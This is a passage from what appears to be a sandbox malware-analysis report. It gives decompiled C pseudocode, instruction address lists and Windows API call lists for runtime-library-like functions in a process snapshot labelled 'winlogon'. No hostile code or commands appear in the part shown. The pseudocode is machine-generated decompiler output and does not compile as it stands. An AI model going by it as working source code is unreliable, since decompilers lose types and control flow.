					 *_t145 = 9;
					L60:
					return _t145 | 0xffffffff;
				}
			}



























































    0x00d75822
    0x00d75829
    0x00d75843
    0x00d75845
    0x00d75bad
    0x00d75bad
    0x00d75bb2
    0x00d75bb2
    0x00d75bba
    0x00d75bc0
    0x00d75bc0
    0x00000000
    0x00d75bc0
    0x00d7584b
    0x00d75851
    0x00000000
    0x00000000
    0x00d75859
    0x00d75865
    0x00d75868
    0x00d7586b
    0x00d7586e
    0x00d75875
    0x00d75878
    0x00d7587c
    0x00d7587f
    0x00d75882
    0x00000000
    0x00000000
    0x00d75888
    0x00d7588b
    0x00d75891
    0x00d758ab
    0x00d758ad
    0x00d75ba9
    0x00000000
    0x00d75ba9
    0x00d758b3
    0x00d758b7
    0x00000000
    0x00000000
    0x00d758bd
    0x00d758c1
    0x00000000
    0x00000000
    0x00d758c8
    0x00d758cc
    0x00d758cf
    0x00d758d2
    0x00d758d7
    0x00d758d7
    0x00d758da
    0x00d758f7
    0x00d758fc
    0x00d758fe
    0x00d75900
    0x00d75920
    0x00d75921
    0x00d75923
    0x00d75926
    0x00d75928
    0x00d7592a
    0x00d7592c
    0x00d7592c
    0x00d75937
    0x00d75939
    0x00d75940
    0x00d75945
    0x00d75948
    0x00d7594b
    0x00d7594d
    0x00d75972
    0x00d75977
    0x00d7597e
    0x00d75981
    0x00d75984
    0x00d75988
    0x00d7598a
    0x00d7598e
    0x00d75990
    0x00d75993
    0x00d75996
    0x00d75998
    0x00d7599b
    0x00d759a2
    0x00d759a5
    0x00d759aa
    0x00d759ad
    0x00d759b6
    0x00d759ba
    0x00d759bd
    0x00d759c0
    0x00d759c3
    0x00d759c9
    0x00d759cb
    0x00d759d4
    0x00d759d7
    0x00d759da
    0x00d759dd
    0x00d759de
    0x00d759e2
    0x00d759e8
    0x00d759f2
    0x00d759f7
    0x00d75a07
    0x00d75a0b
    0x00d75a0e
    0x00d75a10
    0x00d75a12
    0x00d75a14
    0x00d75a16
    0x00d75a1e
    0x00d75a1f
    0x00d75a22
    0x00d75a25
    0x00d75a26
    0x00d75a2c
    0x00d75a36
    0x00d75a3e
    0x00d75a41
    0x00d75a4d
    0x00d75a51
    0x00d75a54
    0x00d75a56
    0x00d75a58
    0x00d75a5a
    0x00d75a5c
    0x00d75a64
    0x00d75a65
    0x00d75a68
    0x00d75a6b
    0x00d75a6b
    0x00d75a6c
    0x00d75a72
    0x00d75a7c
    0x00d75a7c
    0x00d75a5a
    0x00d75a56
    0x00d75a41
    0x00d75a14
    0x00d75a10
    0x00d759f7
    0x00d759cb
    0x00d759c3
    0x00d75a82
    0x00d75a88
    0x00d75a8a
    0x00d75afd
    0x00d75afd
    0x00d75b01
    0x00d75b11
    0x00d75b17
    0x00d75b19
    0x00d75b75
    0x00d75b75
    0x00d75b7d
    0x00d75b7e
    0x00d75b80
    0x00d75b99
    0x00d75b9c
    0x00d75ad9
    0x00d75ada
    0x00000000
    0x00d75adf
    0x00d75ba2
    0x00000000
    0x00d75ba2
    0x00d75b87
    0x00d75b92
    0x00000000
    0x00d75b92
    0x00d75b1b
    0x00d75b1e
    0x00d75b21
    0x00000000
    0x00000000
    0x00d75b23
    0x00d75b23
    0x00d75b26
    0x00d75b29
    0x00d75b2c
    0x00d75b33
    0x00d75b38
    0x00d75b3a
    0x00d75b3e
    0x00d75b59
    0x00d75b5d
    0x00d75b5e
    0x00d75b61
    0x00d75b62
    0x00d75b6e
    0x00d75b64
    0x00d75b64
    0x00d75b64
    0x00d75b40
    0x00d75b40
    0x00d75b40
    0x00d75b4b
    0x00d75b50
    0x00d75b53
    0x00d75b53
    0x00000000
    0x00d75b38
    0x00d75a8f
    0x00d75a92
    0x00d75a99
    0x00d75a9e
    0x00000000
    0x00000000
    0x00d75aa7
    0x00d75aad
    0x00d75aaf
    0x00000000
    0x00000000
    0x00d75ab1
    0x00d75ab5
    0x00000000
    0x00000000
    0x00d75ac9
    0x00d75acf
    0x00d75ad1
    0x00d75af5
    0x00d75af8
    0x00000000
    0x00d75af8
    0x00d75ad3
    0x00000000
    0x00d7594f
    0x00d75954
    0x00d7595f
    0x00d75ae0
    0x00d75ae0
    0x00d75ae0
    0x00d75ae3
    0x00d75ae4
    0x00000000
    0x00d75aec
    0x00d7594d
    0x00d75902
    0x00d75907
    0x00d7590e
    0x00d75914
    0x00000000
    0x00d75914
    0x00d758dc
    0x00d758df
    0x00d758e9
    0x00d758e9
    0x00d758ec
    0x00d758ef
    0x00000000
    0x00d758ef
    0x00d758e3
    0x00d758e5
    0x00d758e7
    0x00000000
    0x00000000
    0x00000000
    0x00d758e7
    0x00d75893
    0x00d75898
    0x00d758a0
    0x00000000
    0x00d7582b
    0x00d75830
    0x00d75833
    0x00d75838
    0x00d75bc5
    0x00000000
    0x00d75bc5

    APIs
      • Part of subcall function 00D717FF: RtlAllocateHeap.NTDLL(00000000,?,?,?,00D61CE9,?,?,?,?,00D61B06,?,00000001), ref: 00D71831
      • Part of subcall function 00D717C5: HeapFree.KERNEL32(00000000,00000000), ref: 00D717DB
    • GetConsoleMode.KERNEL32(?,?), ref: 00D75AA7
    • ReadConsoleW.KERNEL32(?,?,00000000,?,00000000), ref: 00D75AC9
    • GetLastError.KERNEL32(?,?,?,?,00000000,00000000), ref: 00D75AD3
    • ReadFile.KERNEL32(?,?,00000000,?,00000000), ref: 00D75B11
      • Part of subcall function 00D75488: ReadFile.KERNEL32(?,?,00000002,?,00000000), ref: 00D75568
      • Part of subcall function 00D75648: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,00000000,?,?,?,00000000,?,?,00000000,00D78A99), ref: 00D75755
      • Part of subcall function 00D75648: GetLastError.KERNEL32(?,?,00000000,?,?,00000000,00D78A99,?,?,?,?,00000000,00000000), ref: 00D75761
    • GetLastError.KERNEL32(?,?,?,?,00000000,00000000), ref: 00D75B75
    Memory Dump Source
    • Source File: 00000001.00000002.1621971057.00D61000.00000020.sdmp, Offset: 00D60000, based on PE: true
    • Associated: 00000001.00000002.1621960681.00D60000.00000002.sdmp
    • Associated: 00000001.00000002.1621993610.00D7F000.00000002.sdmp
    • Associated: 00000001.00000002.1622007213.00D88000.00000004.sdmp
    • Associated: 00000001.00000002.1622017224.00D89000.00000008.sdmp
    • Associated: 00000001.00000002.1622024620.00D90000.00000004.sdmp
    • Associated: 00000001.00000002.1622032358.00D92000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_d60000_winlogon.jbxd
    Function 00D6E837, Relevance: 7.7, APIs: 5, Instructions: 222
    C-Code - Quality: 96%
    			E00D6E837(void* __ebx, void* __edi, void* __esi, char* _a4, short* _a8, int _a12, intOrPtr _a16) {
				signed int _v8;
				char _v16;
				int _v20;
				int _v24;
				char* _v28;
				int _v32;
				char _v36;
				intOrPtr _v44;
				char _v48;
				signed int _t59;
				char* _t61;
				intOrPtr _t63;
				int _t64;
				intOrPtr* _t65;
				signed int _t68;
				intOrPtr* _t71;
				short* _t73;
				int _t74;
				int _t76;
				char _t78;
				short* _t83;
				short _t85;
				int _t91;
				int _t93;
				char* _t98;
				int _t103;
				char* _t105;
				void* _t106;
				intOrPtr _t108;
				intOrPtr _t109;
				int _t110;
				short* _t113;
				int _t114;
				int _t116;
				signed int _t117;

				_t59 =  *0xd88004; // 0x276b9783
				_v8 = _t59 ^ _t117;
				_t61 = _a4;
				_t91 = _a12;
				_t116 = 0;
				_v28 = _t61;
				_v20 = 0;
				_t113 = _a8;
				_v24 = _t113;
				if(_t61 == 0 || _t91 != 0) {
					if(_t113 != 0) {
						E00D6E412(_t91,  &_v48, _t106, _a16);
						_t98 = _v28;
						if(_t98 == 0) {
							_t63 = _v44;
							if( *((intOrPtr*)(_t63 + 0xa8)) != _t116) {
								_t51 = _t63 + 8; // 0xd86a68
								_t64 = WideCharToMultiByte( *_t51, _t116, _t113, 0xffffffff, _t116, _t116, _t116,  &_v20);
								if(_t64 == 0 || _v20 != _t116) {
									L55:
									_t65 = E00D72122();
									_t114 = _t113 | 0xffffffff;
									 *_t65 = 0x2a;
									goto L56;
								} else {
									_t53 = _t64 - 1; // -1
									_t114 = _t53;
									L56:
									if(_v36 != 0) {
										 *(_v48 + 0x350) =  *(_v48 + 0x350) & 0xfffffffd;
									}
									goto L59;
								}
							}
							_t68 =  *_t113 & 0x0000ffff;
							if(_t68 == 0) {
								L51:
								_t114 = _t116;
								goto L56;
							}
							while(_t68 <= 0xff) {
								_t113 =  &(_t113[1]);
								_t116 = _t116 + 1;
								_t68 =  *_t113 & 0x0000ffff;
								if(_t68 != 0) {
									continue;
								}
								goto L51;
							}
							goto L55;
						}
						_t108 = _v44;
						if( *((intOrPtr*)(_t108 + 0xa8)) != _t116) {
							if( *((intOrPtr*)(_t108 + 4)) != 1) {
								_t26 = _t108 + 8; // 0xd86a68
								_t114 = WideCharToMultiByte( *_t26, _t116, _t113, 0xffffffff, _t98, _t91, _t116,  &_v20);
								if(_t114 == 0) {
									if(_v20 != _t116 || GetLastError() != 0x7a) {
										L45:
										_t71 = E00D72122();
										_t116 = _t116 | 0xffffffff;
										 *_t71 = 0x2a;
										goto L51;
									} else {
										if(_t91 == 0) {
											goto L56;
										}
										_t73 = _v24;
										while(1) {
											_t109 = _v44;
											_t32 = _t109 + 4; // 0x680c6ac3
											_t103 =  *_t32;
											if(_t103 > 5) {
												_t103 = 5;
											}
											_t35 = _t109 + 8; // 0xd86a68
											_t74 = WideCharToMultiByte( *_t35, _t116, _t73, 1,  &_v16, _t103, _t116,  &_v20);
											_t93 = _a12;
											_t110 = _t74;
											if(_t110 == 0 || _v20 != _t116 || _t110 < 0 || _t110 > 5) {
												goto L55;
											}
											if(_t110 + _t114 > _t93) {
												goto L56;
											}
											_t76 = _t116;
											_v32 = _t76;
											if(_t110 <= 0) {
												L43:
												_t73 = _v24 + 2;
												_v24 = _t73;
												if(_t114 < _t93) {
													continue;
												}
												goto L56;
											}
											_t105 = _v28;
											while(1) {
												_t78 =  *((intOrPtr*)(_t117 + _t76 - 0xc));
												 *((char*)(_t105 + _t114)) = _t78;
												if(_t78 == 0) {
													goto L56;
												}
												_t76 = _v32 + 1;
												_t114 = _t114 + 1;
												_v32 = _t76;
												if(_t76 < _t110) {
													continue;
												}
												goto L43;
											}
											goto L56;
										}
										goto L55;
									}
								}
								if(_v20 != _t116) {
									goto L45;
								}
								_t28 = _t114 - 1; // -1
								_t116 = _t28;
								goto L51;
							}
							if(_t91 == 0) {
								L21:
								_t20 = _t108 + 8; // 0xd86a68
								_t116 = WideCharToMultiByte( *_t20, _t116, _t113, _t91, _t98, _t91, _t116,  &_v20);
								if(_t116 == 0 || _v20 != 0) {
									goto L45;
								} else {
									if(_v28[_t116 - 1] == 0) {
										_t116 = _t116 - 1;
									}
									goto L51;
								}
							}
							_t83 = _t113;
							_v24 = _t91;
							while( *_t83 != _t116) {
								_t83 =  &(_t83[1]);
								_t16 =  &_v24;
								 *_t16 = _v24 - 1;
								if( *_t16 != 0) {
									continue;
								}
								break;
							}
							if(_v24 != _t116 &&  *_t83 == _t116) {
								_t91 = (_t83 - _t113 >> 1) + 1;
							}
							goto L21;
						}
						if(_t91 == 0) {
							goto L51;
						}
						while( *_t113 <= 0xff) {
							_t98[_t116] =  *_t113;
							_t85 =  *_t113;
							_t113 =  &(_t113[1]);
							if(_t85 == 0) {
								goto L51;
							}
							_t116 = _t116 + 1;
							if(_t116 < _t91) {
								continue;
							}
							goto L51;
						}
						goto L45;
					}
					 *((intOrPtr*)(E00D72122())) = 0x16;
					E00D70269();
					goto L59;
				} else {
					L59:
					return E00D6ABE4(_v8 ^ _t117);
				}
			}






































    0x00d6e83f
    0x00d6e846
    0x00d6e849
    0x00d6e84d
    0x00d6e851
    0x00d6e853
    0x00d6e856
    0x00d6e85a
    0x00d6e85d
    0x00d6e862
    0x00d6e871
    0x00d6e891
    0x00d6e896
    0x00d6e89b
    0x00d6ea38
    0x00d6ea41
    0x00d6ea70
    0x00d6ea73
    0x00d6ea7b
    0x00d6ea87
    0x00d6ea87
    0x00d6ea8c
    0x00d6ea8f
    0x00000000
    0x00d6ea82
    0x00d6ea82
    0x00d6ea82
    0x00d6ea95
    0x00d6ea99
    0x00d6ea9e
    0x00d6ea9e
    0x00000000
    0x00d6eaa5
    0x00d6ea7b
    0x00d6ea43
    0x00d6ea49
    0x00d6ea61
    0x00d6ea61
    0x00000000
    0x00d6ea61
    0x00d6ea50
    0x00d6ea55
    0x00d6ea58
    0x00d6ea59
    0x00d6ea5f
    0x00000000
    0x00000000
    0x00000000
    0x00d6ea5f
    0x00000000
    0x00d6ea50
    0x00d6e8a1
    0x00d6e8aa
    0x00d6e8e4
    0x00d6e954
    0x00d6e95d
    0x00d6e961
    0x00d6e977
    0x00d6ea28
    0x00d6ea28
    0x00d6ea2d
    0x00d6ea30
    0x00000000
    0x00d6e98c
    0x00d6e98e
    0x00000000
    0x00000000
    0x00d6e994
    0x00d6e997
    0x00d6e997
    0x00d6e99a
    0x00d6e99a
    0x00d6e9a0
    0x00d6e9a4
    0x00d6e9a4
    0x00d6e9b3
    0x00d6e9b6
    0x00d6e9bc
    0x00d6e9bf
    0x00d6e9c3
    0x00000000
    0x00000000
    0x00d6e9e8
    0x00000000
    0x00000000
    0x00d6e9ee
    0x00d6e9f0
    0x00d6e9f5
    0x00d6ea15
    0x00d6ea18
    0x00d6ea1b
    0x00d6ea20
    0x00000000
    0x00000000
    0x00000000
    0x00d6ea26
    0x00d6e9f7
    0x00d6e9fa
    0x00d6e9fa
    0x00d6e9fe
    0x00d6ea03
    0x00000000
    0x00000000
    0x00d6ea0c
    0x00d6ea0d
    0x00d6ea0e
    0x00d6ea13
    0x00000000
    0x00000000
    0x00000000
    0x00d6ea13
    0x00000000
    0x00d6e9fa
    0x00000000
    0x00d6e997
    0x00d6e977
    0x00d6e966
    0x00000000
    0x00000000
    0x00d6e96c
    0x00d6e96c
    0x00000000
    0x00d6e96c
    0x00d6e8e8
    0x00d6e90e
    0x00d6e918
    0x00d6e921
    0x00d6e925
    0x00000000
    0x00d6e935
    0x00d6e93d
    0x00d6e943
    0x00d6e943
    0x00000000
    0x00d6e93d
    0x00d6e925
    0x00d6e8ea
    0x00d6e8ec
    0x00d6e8ef
    0x00d6e8f4
    0x00d6e8f7
    0x00d6e8f7
    0x00d6e8fb
    0x00000000
    0x00000000
    0x00000000
    0x00d6e8fb
    0x00d6e900
    0x00d6e90d
    0x00d6e90d
    0x00000000
    0x00d6e900
    0x00d6e8ae
    0x00000000
    0x00000000
    0x00d6e8b9
    0x00d6e8c4
    0x00d6e8c7
    0x00d6e8ca
    0x00d6e8d0
    0x00000000
    0x00000000
    0x00d6e8d6
    0x00d6e8d9
    0x00000000
    0x00000000
    0x00000000
    0x00d6e8db
    0x00000000
    0x00d6e8b9
    0x00d6e878
    0x00d6e87e
    0x00000000
    0x00d6e868
    0x00d6eaa7
    0x00d6eab7
    0x00d6eab7

    APIs
    • WideCharToMultiByte.KERNEL32(00D86A68,00000000,00000000,00D6A69C,00000000,00D6A69C,00000000,00D6A69C,?,00000000,00000000,?,?,00D6EACD,?,00000000), ref: 00D6E91B
    • WideCharToMultiByte.KERNEL32(00D86A68,00000000,00000000,000000FF,00000000,00D6A69C,00000000,00D6A69C,?,00000000,00000000,?,?,00D6EACD,?,00000000), ref: 00D6E957
    • GetLastError.KERNEL32(?,?,00D6EACD,?,00000000,00D6A69C,00000000,?,00D6A69C,00000000,123,00000003), ref: 00D6E97D
    • WideCharToMultiByte.KERNEL32(00D86A68,00000000,?,00000001,00000000,680C6AC3,00000000,00D6A69C,?,?,00D6EACD,?,00000000,00D6A69C,00000000), ref: 00D6E9B6
    • WideCharToMultiByte.KERNEL32(00D86A68,00000000,00000000,000000FF,00000000,00000000,00000000,00D6A69C,?,00000000,00000000,?,?,00D6EACD,?,00000000), ref: 00D6EA73
      • Part of subcall function 00D6ABE4: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00D6AEA3
    Memory Dump Source
    • Source File: 00000001.00000002.1621971057.00D61000.00000020.sdmp, Offset: 00D60000, based on PE: true
    • Associated: 00000001.00000002.1621960681.00D60000.00000002.sdmp
    • Associated: 00000001.00000002.1621993610.00D7F000.00000002.sdmp
    • Associated: 00000001.00000002.1622007213.00D88000.00000004.sdmp
    • Associated: 00000001.00000002.1622017224.00D89000.00000008.sdmp
    • Associated: 00000001.00000002.1622024620.00D90000.00000004.sdmp
    • Associated: 00000001.00000002.1622032358.00D92000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_d60000_winlogon.jbxd
    Function 00D7721A, Relevance: 7.6, APIs: 5, Instructions: 110
    C-Code - Quality: 81%
    			E00D7721A(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, int _a8, char* _a12, int _a16, short* _a20, int _a24, intOrPtr _a28) {
				signed int _v8;
				int _v12;
				char _v16;
				intOrPtr _v24;
				char _v28;
				void* _v40;
				signed int _t34;
				signed int _t40;
				int _t46;
				int _t53;
				void* _t55;
				int _t57;
				signed int _t63;
				int _t67;
				short* _t69;
				signed int _t70;
				short* _t71;

				_t34 =  *0xd88004; // 0x276b9783
				_v8 = _t34 ^ _t70;
				E00D6E412(__ebx,  &_v28, __edx, _a4);
				_t57 = _a24;
				if(_t57 == 0) {
					_t53 =  *(_v24 + 8);
					_t57 = _t53;
					_a24 = _t53;
				}
				_t67 = 0;
				_t40 = MultiByteToWideChar(_t57, 1 + (0 | _a28 != 0x00000000) * 8, _a12, _a16, 0, 0);
				_v12 = _t40;
				if(_t40 == 0) {
					L15:
					if(_v16 != 0) {
						 *(_v28 + 0x350) =  *(_v28 + 0x350) & 0xfffffffd;
					}
					return E00D6ABE4(_v8 ^ _t70);
				}
				_t55 = _t40 + _t40;
				asm("sbb eax, eax");
				if((_t55 + 0x00000008 & _t40) == 0) {
					_t69 = 0;
					L11:
					if(_t69 != 0) {
						E00D6D520(_t67, _t69, _t67, _t55);
						_t46 = MultiByteToWideChar(_a24, 1, _a12, _a16, _t69, _v12);
						if(_t46 != 0) {
							_t67 = GetStringTypeW(_a8, _t69, _t46, _a20);
						}
					}
					L14:
					E00D77337(_t69);
					goto L15;
				}
				asm("sbb eax, eax");
				_t48 = _t40 & _t55 + 0x00000008;
				_t63 = _t55 + 8;
				if((_t40 & _t55 + 0x00000008) > 0x400) {
					asm("sbb eax, eax");
					_t69 = E00D717FF(_t63, _t48 & _t63);
					if(_t69 == 0) {
						goto L14;
					}
					 *_t69 = 0xdddd;
					L9:
					_t69 =  &(_t69[4]);
					goto L11;
				}
				asm("sbb eax, eax");
				E00D7D520();
				_t69 = _t71;
				if(_t69 == 0) {
					goto L14;
				}
				 *_t69 = 0xcccc;
				goto L9;
			}




















    0x00d77222
    0x00d77229
    0x00d77235
    0x00d7723a
    0x00d7723f
    0x00d77244
    0x00d77247
    0x00d77249
    0x00d77249
    0x00d7724e
    0x00d77267
    0x00d7726d
    0x00d77272
    0x00d77311
    0x00d77315
    0x00d7731a
    0x00d7731a
    0x00d77336
    0x00d77336
    0x00d77278
    0x00d77280
    0x00d77284
    0x00d772d0
    0x00d772d2
    0x00d772d4
    0x00d772d9
    0x00d772f0
    0x00d772f8
    0x00d77308
    0x00d77308
    0x00d772f8
    0x00d7730a
    0x00d7730b
    0x00000000
    0x00d77310
    0x00d7728b
    0x00d7728d
    0x00d7728f
    0x00d77297
    0x00d772b4
    0x00d772be
    0x00d772c3
    0x00000000
    0x00000000
    0x00d772c5
    0x00d772cb
    0x00d772cb
    0x00000000
    0x00d772cb
    0x00d7729b
    0x00d7729f
    0x00d772a4
    0x00d772a8
    0x00000000
    0x00000000
    0x00d772aa
    0x00000000

    APIs
    • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00D73AE8,?,00000000,?,00000001,?,?,00000001,00D73AE8,?), ref: 00D77267
    • __alloca_probe_16.NTDLLP ref: 00D7729F
      • Part of subcall function 00D717FF: RtlAllocateHeap.NTDLL(00000000,?,?,?,00D61CE9,?,?,?,?,00D61B06,?,00000001), ref: 00D71831
    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00D772F0
    • GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00D719A1,?), ref: 00D77302
    • __freea.LIBCMT ref: 00D7730B
      • Part of subcall function 00D6ABE4: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00D6AEA3
    Memory Dump Source
    • Source File: 00000001.00000002.1621971057.00D61000.00000020.sdmp, Offset: 00D60000, based on PE: true
    • Associated: 00000001.00000002.1621960681.00D60000.00000002.sdmp
    • Associated: 00000001.00000002.1621993610.00D7F000.00000002.sdmp
    • Associated: 00000001.00000002.1622007213.00D88000.00000004.sdmp
    • Associated: 00000001.00000002.1622017224.00D89000.00000008.sdmp
    • Associated: 00000001.00000002.1622024620.00D90000.00000004.sdmp
    • Associated: 00000001.00000002.1622032358.00D92000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_d60000_winlogon.jbxd
    Function 00D6C90E, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 104
    C-Code - Quality: 61%
    			E00D6C90E(void* __edx, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32) {
				intOrPtr _v0;
				char _v8;
				char _v12;
				intOrPtr* _v16;
				intOrPtr* _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr* _v32;
				intOrPtr* _v60;
				void* __ebx;
				void* __ecx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t70;
				void* _t71;
				intOrPtr* _t74;
				intOrPtr* _t78;
				intOrPtr* _t82;
				intOrPtr* _t83;
				intOrPtr _t84;
				intOrPtr _t86;
				intOrPtr* _t87;
				intOrPtr* _t89;
				signed int _t93;
				void* _t97;
				intOrPtr _t98;
				intOrPtr* _t100;
				char _t101;
				void* _t105;
				intOrPtr _t111;
				char _t114;
				intOrPtr _t116;
				intOrPtr* _t119;
				intOrPtr* _t121;
				intOrPtr* _t123;
				intOrPtr _t129;
				void* _t130;
				intOrPtr* _t131;
				intOrPtr* _t132;
				signed int* _t136;
				void* _t138;
				void* _t140;
				void* _t141;
				void* _t142;

				_t113 = __edx;
				_push(_t105);
				_push(_t105);
				_t119 = _a4;
				_t143 =  *_t119 - 0x80000003;
				if( *_t119 == 0x80000003) {
					L18:
					return _t70;
				} else {
					_t71 = E00D6DA88(_t97, _t105, __edx, _t119, _t130, _t143, _t130, _t97);
					_t98 = _a20;
					_t144 =  *((intOrPtr*)(_t71 + 8));
					if( *((intOrPtr*)(_t71 + 8)) == 0) {
						L6:
						if( *((intOrPtr*)(_t98 + 0xc)) == 0) {
							E00D6E7FB(_t98, _t105, _t113, _t119);
							asm("int3");
							_t138 = _t140;
							_t141 = _t140 - 0x18;
							_push(_t98);
							_push(_t130);
							_t131 = _v16;
							_push(_t119);
							__eflags = _t131;
							if(_t131 == 0) {
								E00D6E7FB(_t98, _t105, _t113, _t119);
								asm("int3");
								_push(_t138);
								_push(_t98);
								_push(_t131);
								_push(_t119);
								_t121 = _v60;
								_t132 = 0;
								__eflags =  *_t121;
								if( *_t121 <= 0) {
									L37:
									_t74 = 0;
									__eflags = 0;
								} else {
									_t100 = 0;
									while(1) {
										_t78 = E00D6D4DE( *((intOrPtr*)(_t100 +  *((intOrPtr*)(_t121 + 4)) + 4)) + 4, 0xd90bac);
										__eflags = _t78;
										if(_t78 == 0) {
											break;
										}
										_t132 = _t132 + 1;
										_t100 = _t100 + 0x10;
										__eflags = _t132 -  *_t121;
										if(_t132 <  *_t121) {
											continue;
										} else {
											goto L37;
										}
										goto L38;
									}
									_t74 = 1;
								}
								L38:
								return _t74;
							} else {
								_t123 =  *_t131;
								_t101 = 0;
								__eflags = _t123;
								if(_t123 > 0) {
									_t114 = 0;
									_v12 = 0;
									_t82 =  *((intOrPtr*)( *((intOrPtr*)(_v0 + 0x1c)) + 0xc));
									_t83 = _t82 + 4;
									__eflags = _t83;
									_v24 =  *_t82;
									_v32 = _t83;
									do {
										_t109 = _t83;
										_t84 = _v24;
										_v20 = _t83;
										_v16 = _t84;
										__eflags = _t84;
										if(_t84 > 0) {
											_t86 =  *((intOrPtr*)(_t131 + 4)) + _t114;
											__eflags = _t86;
											_v28 = _t86;
											while(1) {
												_t87 = E00D6CEF6(_t86,  *_t109,  *((intOrPtr*)(_v0 + 0x1c)));
												_t141 = _t141 + 0xc;
												__eflags = _t87;
												if(_t87 != 0) {
													break;
												}
												_t89 = _v16 - 1;
												_t109 = _v20 + 4;
												_v16 = _t89;
												__eflags = _t89;
												_v20 = _v20 + 4;
												_t86 = _v28;
												if(_t89 > 0) {
													continue;
												} else {
												}
												L29:
												_t114 = _v12;
												goto L30;
											}
											_t101 = 1;
											goto L29;
										}
										L30:
										_t83 = _v32;
										_t114 = _t114 + 0x10;
										_v12 = _t114;
										_t123 = _t123 - 1;
										__eflags = _t123;
									} while (_t123 != 0);
								}
								return _t101;
							}
						} else {
							_t70 = E00D6D7B7(_t105, _t98, _a28, _a24,  &_v12,  &_v8);
							_t111 = _v12;
							_t142 = _t140 + 0x14;
							_t116 = _v8;
							if(_t111 < _t116) {
								_t17 = _t70 + 0xc; // 0xc
								_t136 = _t17;
								_t70 = _a24;
								do {
									if(_t70 >=  *((intOrPtr*)(_t136 - 0xc)) && _t70 <=  *((intOrPtr*)(_t136 - 8))) {
										_t93 =  *_t136 << 4;
										if( *((intOrPtr*)(_t136[1] + _t93 - 0xc)) == 0) {
											L13:
											_t94 = _t93 + _t136[1] + 0xfffffff0;
											_t129 = _a4;
											if(( *(_t93 + _t136[1] + 0xfffffff0) & 0x00000040) == 0) {
												_push(1);
												_t35 = _t136 - 0xc; // 0x0
												E00D6C4E1(_t98, _t116, _t129, _a8, _a12, _a16, _t98, _t94, 0, _t35, _a28, _a32);
												_t116 = _v8;
												_t142 = _t142 + 0x2c;
												_t111 = _v12;
											}
										} else {
											_t116 = _v8;
											_t98 = _a20;
											if( *((char*)( *((intOrPtr*)(_t136[1] + _t93 - 0xc)) + 8)) == 0) {
												goto L13;
											}
										}
										_t70 = _a24;
									}
									_t111 = _t111 + 1;
									_t136 =  &(_t136[5]);
									_v12 = _t111;
								} while (_t111 < _t116);
							}
							goto L17;
						}
					} else {
						__imp__EncodePointer(0);
						_t130 = _t71;
						if( *((intOrPtr*)(E00D6DA88(_t98, _t105, __edx, _t119, _t130, _t144) + 8)) == _t130 ||  *_t119 == 0xe0434f4d ||  *_t119 == 0xe0434352) {
							goto L6;
						} else {
							_t70 = E00D6D6DA(_t119, _a8, _a12, _a16, _t98, _a28, _a32);
							_t140 = _t140 + 0x1c;
							if(_t70 != 0) {
								L17:
								goto L18;
							} else {
								goto L6;
							}
						}
					}
				}
			}
















































    0x00d6c90e
    0x00d6c911
    0x00d6c912
    0x00d6c914
    0x00d6c917
    0x00d6c91d
    0x00d6ca1e
    0x00d6ca22
    0x00d6c923
    0x00d6c925
    0x00d6c92a
    0x00d6c92d
    0x00d6c931
    0x00d6c978
    0x00d6c97c
    0x00d6ca23
    0x00d6ca28
    0x00d6ca2a
    0x00d6ca2c
    0x00d6ca2f
    0x00d6ca30
    0x00d6ca31
    0x00d6ca34
    0x00d6ca35
    0x00d6ca37
    0x00d6cabf
    0x00d6cac4
    0x00d6cac5
    0x00d6cac8
    0x00d6cac9
    0x00d6caca
    0x00d6cacb
    0x00d6cace
    0x00d6cad0
    0x00d6cad2
    0x00d6caf9
    0x00d6caf9
    0x00d6caf9
    0x00d6cad4
    0x00d6cad4
    0x00d6cad6
    0x00d6cae6
    0x00d6caed
    0x00d6caef
    0x00000000
    0x00000000
    0x00d6caf1
    0x00d6caf2
    0x00d6caf5
    0x00d6caf7
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00d6caf7
    0x00d6cb00
    0x00d6cb00
    0x00d6cafb
    0x00d6caff
    0x00d6ca3d
    0x00d6ca3d
    0x00d6ca3f
    0x00d6ca41
    0x00d6ca43
    0x00d6ca48
    0x00d6ca4a
    0x00d6ca50
    0x00d6ca55
    0x00d6ca55
    0x00d6ca58
    0x00d6ca5b
    0x00d6ca5e
    0x00d6ca5e
    0x00d6ca60
    0x00d6ca63
    0x00d6ca66
    0x00d6ca69
    0x00d6ca6b
    0x00d6ca70
    0x00d6ca70
    0x00d6ca72
    0x00d6ca75
    0x00d6ca7e
    0x00d6ca83
    0x00d6ca86
    0x00d6ca88
    0x00000000
    0x00000000
    0x00d6ca90
    0x00d6ca91
    0x00d6ca94
    0x00d6ca97
    0x00d6ca99
    0x00d6ca9c
    0x00d6ca9f
    0x00000000
    0x00000000
    0x00d6caa1
    0x00d6caa5
    0x00d6caa5
    0x00000000
    0x00d6caa5
    0x00d6caa3
    0x00000000
    0x00d6caa3
    0x00d6caa8
    0x00d6caa8
    0x00d6caab
    0x00d6caae
    0x00d6cab1
    0x00d6cab1
    0x00d6cab1
    0x00d6ca5e
    0x00d6cabe
    0x00d6cabe
    0x00d6c982
    0x00d6c991
    0x00d6c996
    0x00d6c999
    0x00d6c99c
    0x00d6c9a1
    0x00d6c9a3
    0x00d6c9a3
    0x00d6c9a6
    0x00d6c9a9
    0x00d6c9ac
    0x00d6c9b8
    0x00d6c9c1
    0x00d6c9d6
    0x00d6c9dc
    0x00d6c9de
    0x00d6c9e4
    0x00d6c9e6
    0x00d6c9eb
    0x00d6ca00
    0x00d6ca05
    0x00d6ca08
    0x00d6ca0b
    0x00d6ca0b
